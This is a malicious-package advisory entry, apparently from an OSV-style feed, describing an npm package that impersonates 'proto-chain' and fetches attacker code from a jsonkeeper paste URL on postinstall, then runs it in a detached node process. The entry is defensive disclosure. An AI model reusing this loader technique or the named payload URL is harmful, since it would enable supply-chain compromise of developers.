MAL-2026-6079

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (bdb11eef3afbfc268bd48a18737884246861c7ae9e6a3d29901ae1379216c633) lib/index.js contains a base64-encoded URL (decoding to https://jsonkeeper.com/b/BN77K, an anonymous mutable paste host) that is fetched via axios.get; the response's `.data.cookie` field is then written to the stdin of a detached `node` child process for execution. The top-level index.js calls getThetaInterface() unconditionally, and package.json declares `postinstall: node index.js`, so the fetch-and-execute path fires automatically on `npm install` as well as on require(). The fetched payload is attacker-controlled and can change at any time. The package additionally impersonates the legitimate `proto-chain` package (README header `# proto-chain`, runtime error messages referencing `require('proto-chain')`), making accidental installs more likely.